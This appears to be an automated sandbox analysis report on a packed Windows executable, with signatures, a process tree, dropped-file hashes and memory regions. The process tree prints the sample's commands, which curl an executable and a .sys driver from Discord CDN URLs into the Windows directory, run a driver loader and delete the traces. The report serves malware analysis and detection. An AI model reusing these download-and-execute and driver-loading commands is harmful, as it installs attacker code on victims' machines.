Analysis

  • max time kernel
    147s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231222-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22/12/2023, 10:27

General

  • Target

    84dfe3e2c2c23431bf1016ea20d6c329.exe

  • Size

    5.4MB

  • MD5

    84dfe3e2c2c23431bf1016ea20d6c329

  • SHA1

    a550c42c27139a7b6342edefed46646847ef0e90

  • SHA256

    3b0cf0a25f13296540bfcc2e891958adc7c8c7aa799cf4cc1988d79299f6c1c4

  • SHA512

    6a08f161325481c5ef1242ab3707935cdb24f54ec0b992a1a5fb459bea1be49ab68f949b578f39c3c5b61b0c834f03e82477171a1aec2a02a86bb3839825fac4

  • SSDEEP

    98304:UFKcieVSvNTwVaUSCBsZgw2PJ2Q9tv9aiayBgfBY1CXpmzL7J/C7dep4mh:UDObUSCZwmJ2Ud9paICOkobUep4W

Score
7/10

Malware Config

Signatures

  • VMProtect packed file 3 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 14 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
  • Suspicious use of FindShellTrayWindow 25 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\84dfe3e2c2c23431bf1016ea20d6c329.exe
    "C:\Users\Admin\AppData\Local\Temp\84dfe3e2c2c23431bf1016ea20d6c329.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:5048
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c Color C
      2⤵
        PID:4772
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c start https://discord.gg/7fhtVRZEC6
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4848
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://discord.gg/7fhtVRZEC6
          3⤵
          • Enumerates system info in registry
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          • Suspicious use of WriteProcessMemory
          PID:1500
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffcf0946f8,0x7fffcf094708,0x7fffcf094718
            4⤵
              PID:3312
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2152,372406454507801531,5231337581874341088,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2896 /prefetch:8
              4⤵
                PID:4420
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2152,372406454507801531,5231337581874341088,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2216 /prefetch:3
                4⤵
                • Suspicious behavior: EnumeratesProcesses
                PID:2548
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2152,372406454507801531,5231337581874341088,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2164 /prefetch:2
                4⤵
                  PID:2844
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,372406454507801531,5231337581874341088,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3628 /prefetch:1
                  4⤵
                    PID:788
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,372406454507801531,5231337581874341088,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3620 /prefetch:1
                    4⤵
                      PID:3288
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,372406454507801531,5231337581874341088,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4524 /prefetch:1
                      4⤵
                        PID:4212
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2152,372406454507801531,5231337581874341088,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=3596 /prefetch:8
                        4⤵
                        • Modifies registry class
                        • Suspicious behavior: EnumeratesProcesses
                        PID:3616
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2152,372406454507801531,5231337581874341088,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4000 /prefetch:8
                        4⤵
                          PID:412
                        • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2152,372406454507801531,5231337581874341088,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5772 /prefetch:8
                          4⤵
                          • Suspicious behavior: EnumeratesProcesses
                          PID:3164
                        • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2152,372406454507801531,5231337581874341088,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5772 /prefetch:8
                          4⤵
                            PID:1688
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,372406454507801531,5231337581874341088,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5456 /prefetch:1
                            4⤵
                              PID:1776
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,372406454507801531,5231337581874341088,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4316 /prefetch:1
                              4⤵
                                PID:380
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,372406454507801531,5231337581874341088,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3224 /prefetch:1
                                4⤵
                                  PID:4852
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,372406454507801531,5231337581874341088,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4224 /prefetch:1
                                  4⤵
                                    PID:2532
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2152,372406454507801531,5231337581874341088,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2780 /prefetch:2
                                    4⤵
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:4536
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c curl https://cdn.discordapp.com/attachments/882824212316835860/883920268165275648/Monke.exe --output C:\Windows\IME\CongratsYouCrackedAUnprotectedLoader1.exe
                                2⤵
                                  PID:4940
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c curl https://cdn.discordapp.com/attachments/882824212316835860/883920352911163392/CongratsYouCrackedAUnprotectedInjector.sys --output C:\Windows\IME\CongratsYouCrackedAUnprotectedLoader.sys
                                  2⤵
                                    PID:3736
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c C:\Windows\IME\CongratsYouCrackedAUnprotectedLoader1.exe C:\Windows\IME\CongratsYouCrackedAUnprotectedLoader.sys
                                    2⤵
                                      PID:2120
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c C:\Windows\Monke.exe C:\Windows\GigaByteTech.sys >nul 2>&1
                                      2⤵
                                        PID:1176
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c del /f /q C:\Windows\IME\CongratsYouCrackedAUnprotectedLoader.sys
                                        2⤵
                                          PID:1720
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c del /f /q C:\Windows\IME\CongratsYouCrackedAUnprotectedLoader1.exe
                                          2⤵
                                            PID:5040
                                        • C:\Windows\System32\CompPkgSrv.exe
                                          C:\Windows\System32\CompPkgSrv.exe -Embedding
                                          1⤵
                                            PID:5040
                                          • C:\Windows\System32\CompPkgSrv.exe
                                            C:\Windows\System32\CompPkgSrv.exe -Embedding
                                            1⤵
                                              PID:3308
                                            • C:\Windows\system32\curl.exe
                                              curl https://cdn.discordapp.com/attachments/882824212316835860/883920268165275648/Monke.exe --output C:\Windows\IME\CongratsYouCrackedAUnprotectedLoader1.exe
                                              1⤵
                                              • Drops file in Windows directory
                                              PID:1988
                                            • C:\Windows\system32\curl.exe
                                              curl https://cdn.discordapp.com/attachments/882824212316835860/883920352911163392/CongratsYouCrackedAUnprotectedInjector.sys --output C:\Windows\IME\CongratsYouCrackedAUnprotectedLoader.sys
                                              1⤵
                                              • Drops file in Windows directory
                                              PID:4624

                                            Network

                                                  MITRE ATT&CK Enterprise v15

                                                  Replay Monitor

                                                  Loading Replay Monitor...

                                                  Downloads

                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                    Filesize

                                                    152B

                                                    MD5

                                                    1386433ecc349475d39fb1e4f9e149a0

                                                    SHA1

                                                    f04f71ac77cb30f1d04fd16d42852322a8b2680f

                                                    SHA256

                                                    a7c79320a37d3516823f533e0ca73ed54fc4cdade9999b9827d06ea9f8916bbc

                                                    SHA512

                                                    fcd5449c58ead25955d01739929c42ffc89b9007bc2c8779c05271f2d053be66e05414c410738c35572ef31811aff908e7fe3dd7a9cef33c27acb308a420280e

                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                    Filesize

                                                    2KB

                                                    MD5

                                                    0f6976ad6d5540f1f51f0df6839d48c9

                                                    SHA1

                                                    d5f7f1a5c8308766c23d4d07b443ceffae8b13be

                                                    SHA256

                                                    a807bebf57431338d1d2e4ab939370aec25f17bf6fdb903335b69a2cffeb55f1

                                                    SHA512

                                                    6799e3c695660c81b7bd30c91c97289a826967f75cec76e322b01c2105f825b5c0241038b7c35eed2dd09961bc83f96b965379a9e20f5d04b3abebbe643a4082

                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                    Filesize

                                                    537B

                                                    MD5

                                                    174d2805548b3042244d48d9917aecde

                                                    SHA1

                                                    f01ed149e9dd669ec548e55ff9210e3693fe7ad9

                                                    SHA256

                                                    e72fe1eef49f172b5b6f2aa423d6e77d54a86abc3d86a3765084abeca55e5ef7

                                                    SHA512

                                                    50fd27d8f07417d786b3300a0ae27c1b1802f5bb0d9fbf9c32260d63604f1a68cc698836922258bed984d4961442419bceb533c0bd7dc67c88e28d993db5e345

                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                    Filesize

                                                    5KB

                                                    MD5

                                                    cd7a481992bb3c6c6c91230ebe41719a

                                                    SHA1

                                                    6f015adee0521bf04a0a1947d0b03b4c2e5602eb

                                                    SHA256

                                                    833dfd26a6d489a70511c3f8c7b2a3892b5d564f4a713bef70ce8109cf7ee0df

                                                    SHA512

                                                    79582828cbd9ab1183c5349f432421163d690f56f967eea3c6101a17becdd0e6b2e921229535bf231f1d258e7c3e3bb5c5dccd6523d9eb8d2f0e0909ff75174b

                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                    Filesize

                                                    5KB

                                                    MD5

                                                    3a2e0c9dcc0cfd4506dfeb7380e9f8e1

                                                    SHA1

                                                    46c09db0c959a43fe52e51d8ae0784f5790744d9

                                                    SHA256

                                                    e40c399298236afe95b2f6d012f920086222d0fbc114e7efa567218cb4229c24

                                                    SHA512

                                                    e987c6e7a2335e34a435abaacd4065e63bbdfa57c8ee6d56e3b8a0581f279a04375ae7c5b6b1c51068e9385d4d950231b4ef54d7eca00261ff78b33b3f2a255f

                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

                                                    Filesize

                                                    24KB

                                                    MD5

                                                    e664066e3aa135f185ed1c194b9fa1f8

                                                    SHA1

                                                    358ff3c6ad0580b8ae1e5ef2a89a4e597c2efdc5

                                                    SHA256

                                                    86e595be48dbc768a52d7ea62116036c024093e1302aced8c29dd6a2d9935617

                                                    SHA512

                                                    58710818b5f664006a5aa418da6c8cd3f709c2265bc161f81b9dfe6cdb8304fabaa4ce9deba419fe4281623feeeaa0321f481ae5855d347c6d8cf95968ee905e

                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                                    Filesize

                                                    16B

                                                    MD5

                                                    6752a1d65b201c13b62ea44016eb221f

                                                    SHA1

                                                    58ecf154d01a62233ed7fb494ace3c3d4ffce08b

                                                    SHA256

                                                    0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

                                                    SHA512

                                                    9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                    Filesize

                                                    10KB

                                                    MD5

                                                    574e914ae828133a9e2752b81f0fba77

                                                    SHA1

                                                    040648b6303490ba437e36f9cea5d55cfa46b089

                                                    SHA256

                                                    9277cf0627923c25e9d6a618e5aa8f68bd7919dcdade570496e4c6497cad754c

                                                    SHA512

                                                    0c1fb4d014a7962b08b257287685130dc73c17aadd0191d3e958c001b206c0ca005bb08cde84389a9738a753775e657742d63a0184f2e29b1f011da708936e9b

                                                  • C:\Windows\IME\CongratsYouCrackedAUnprotectedLoader.sys

                                                    Filesize

                                                    262B

                                                    MD5

                                                    2a9323a6cbaff798e17c01be2f9b4b4e

                                                    SHA1

                                                    f21da1dff74fa8a4fc700053352bb70d43d3d3ea

                                                    SHA256

                                                    d89542d7df229de0447f183395234cf06adb621ac143567b1559e05d94d32d89

                                                    SHA512

                                                    84eaaf174dfc83c7aac9182eb565ed10f70319bac3b25429b1d281b1a5d9787545d77dd924903845d2cd213d60ae016818e8fba3bbadd648b5fad38348285688

                                                  • C:\Windows\IME\CongratsYouCrackedAUnprotectedLoader1.exe

                                                    Filesize

                                                    229B

                                                    MD5

                                                    3631fb192c457a8b79e24be447f130c2

                                                    SHA1

                                                    d1e91dbc18a6cea9f3a70ba917b5d95cc64fb040

                                                    SHA256

                                                    9729db4909f45672e4220a333f95ef8e5b8b1f17bdfb86fd5c3a6fd511d576c0

                                                    SHA512

                                                    5cd5bf670f06f597322b03fac537c3082e8d0f13a81c47157353c10cbca34bc4a59a4b6ed35ae949b25250f175d423ea14a9f89f0bd9bd502ef3338328fb0415

                                                  • memory/5048-1-0x00007FF65BED0000-0x00007FF65C829000-memory.dmp

                                                    Filesize

                                                    9.3MB

                                                  • memory/5048-291-0x00007FF65BED0000-0x00007FF65C829000-memory.dmp

                                                    Filesize

                                                    9.3MB

                                                  • memory/5048-2-0x00007FF65BED0000-0x00007FF65C829000-memory.dmp

                                                    Filesize

                                                    9.3MB

                                                  • memory/5048-0-0x00007FFFED310000-0x00007FFFED312000-memory.dmp

                                                    Filesize

                                                    8KB